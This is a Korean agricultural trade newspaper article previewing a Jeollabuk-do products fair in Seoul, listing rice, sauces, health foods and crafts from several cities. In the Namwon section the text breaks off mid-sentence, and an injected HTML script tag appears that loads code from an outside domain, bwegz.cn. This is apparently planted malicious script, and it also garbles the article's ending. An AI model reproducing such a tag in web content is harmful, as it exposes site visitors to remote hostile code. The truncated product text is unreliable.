전라북도에서 생산되는 우수 공산품·가공식품·농축산물이 한자리에 모인다.
전북도·농협전북지역본부가 공동주최하고 본지가 주관하는 `청정 전북 우수상품 페어''가 23일 서울 양재동 소재 aT센터에서 개최된다.

이번 페어에는 14개 시·군이 엄선한 공산품 33개, 가공식품 122개, 농축수산물 45개 등 총200여 품목이 선보인다.
`청정 전북 우수상품 페어''에서 선보이는 제품을 미리 알아본다.

■전주시
전주시는 우리나라 전통음료·식품인 콩물, 청국장, 청국장 강정 등을 비롯해 건강보조식품, 공예품 등을 대거 선보인다.
국산 1등급 햇토종콩만을 원료로 한 토종콩청국장은 재래식방법으로 절구통에 찧어 콩알이 살아있으며, 영양소가 파괴되지 않아 전통 청국장맛을 자랑한다. 청국장강정은 기존 끓여 먹는 청국장에서 간식으로 먹을 수 있도록 개발한 제품으로 아이들과 젊은층의 인기를 끌고 있다.

우리나라 전통음료인 `함씨네 토종콩물''은 한끼 식사대용이나 건강음료, 콩국수용으로 간편하게 이용할 수 있도록 개발됐다. 건강보조식품인 새벽생식은 아카시아꿀 및 잡화꿀을 중심으로 우리 농산물을 사용한 식품이다.
한편 전통공예품으로는 옻칠제기세트, 사군자 문양 주전자 및 술잔세트, 복주전자, 찻잔세트, 등나무문양 찻잔, 찻상 등이 있다. 또 항균, 살균작용이 있는 참숯도마도 있다.

■군산시
생산에서 유통까지 냉장유통시스템을 운영하고 있는 (주)동우는 `동우닭고기''를, 우량농산은 칼슘함량을 높인 `우량팽이버섯''을, 군산배연구회는 맛과 신선도가 뛰어난 `군산배''를 내놓는다. 회현농협RPC와 군산도정공장은 각각 군산시장이 맛과 품질을 보증하는 `군산청정쌀'', 보리쌀의 씨눈을 살린 `흰찰쌀보리쌀''을 선보인다.

장류로는 재래식 전통맛을 살린 옹고집의 `옹고집장집'', 각종 양념을 첨가한 `토장촌(양념된장)'', 꽃게맛을 살린 (유)내고향꽃게장의 `계곡가든 꽃게장''이 출품된다. 농민농산의 `토장촌(감자맛바)''와 (주)대두식품의 `화과방 홍삼양갱'', `화과방 양갱세트'', `화과방 과일떡세트'', `화과방 죽선물세트''는 간식은 물론 식사대용으로 좋은 제품이다.
공산품으로 월령공방의 목공예품이 선보인다.

■익산시
(주)푸르메는 26가지 잡곡을 한번에 모은 `무세미영양 잡곡건강식+26'', 표고버섯맛을 살린 `표고버섯밥영양식'', `야채밥건강잡곡'' 등 씻지 않고 먹을 수 있는 건강 영양식을 선보인다.
함열농업협동조합은 집단 단지에서 유기농법으로 재배한 `익산 순수미''를, 삼기농업협동조합은 익산 삼기의 황토밭에서 원적외선으로 재배한 `익산날씬이(밤고구마)''를 출품한다. 이들 제품은 각각 익산시장, 익산시농업기술센터가 그 품질을 보증하고 있다.

은성식품은 손국수의 맛을 그대로 살린 `수연소면''을 내놓는다.
공산품에는 장산공예의 `옷칠찻잔'', `보석함''을 비롯 (주)영신스톤의 천연석그릇 `stonelee'', 장우엔지니어링(주)의 과일선별기 `음성중량선별기'', 상명이엔텍(주)의 보일러 연소촉매제 `수트마스터'', 자생미의 바디워시 `아르피'' 등이 출품된다.

■정읍시
첨단농원은 게르마늄이 함유된 `첨단게르마늄가지'', `첨단게르마늄쌀'', `첨단게르마늄여주''를 내놓는다.
디엠푸드(주)는 100%국산 1A등급 원유를 저온살균처리한 `내츄럴밀크'', `호상요구르트''를 출품한다. 신태인농업협동조합은 `태양초 단풍고춧가루'', 한국식품은 `한국치자맛단무지'', (주)자생당은 전통주 `애인''을 내놓는다.

금계식품은 비타민C가 풍부한 먹시감을 이용한 `샘고을 감식초'', `샘고을 콜다운감식초'', `샘고을 금란초'', `샘고을 까만초콩환'', `샘고을 속풀이곶감중탕'' 등을 선보인다.
건강제품으로는 정읍양잠농업협동조합의 `냉동누에가루'', `누에동충하초'', `냉동누에환''을 비롯 (정읍)소성농협의 `純농협누에'', 칠보농협옹동제약의 `홍삼쌍화고'', `옹동지황고'', (주)자생당의 `홍국미'' 등이 있다.
공산품에는 (주)굿엠의 쌀냉장고 `리치인''이 있다.

■남원시
남원시는 임산물과 다양한 건강가공식품, 장식품들을 대거 소개한다.
남원산림조합의 산림향나물, 산림 오향차, 산림 잣, 산림 호도 등 임산물이 전시된다.
놀부네전통식품은 산머루생즙과 모과발효원액, 오미자발효원액, 솔청발효원액을 선보인다.
G-푸드 영농조합법인은 16가지 전통한약재를 먹여 건강하게 만든 참스참닭을 소개한다.

산내농업경영인 영농조합법인은 지리산 뱀사골 고로쇠를, 춘향고을 전통한과는 다양한 한과 품목인 춘향이외 14종을 전시한다.
또 동부영농조합법인은 춘향골 맛김치를 전시하며, 고려인삼제품(주)은 명품?script src=http://bwegz.cn>

저작권자 © 농수축산신문 무단전재, 재배포 및 AI학습 이용 금지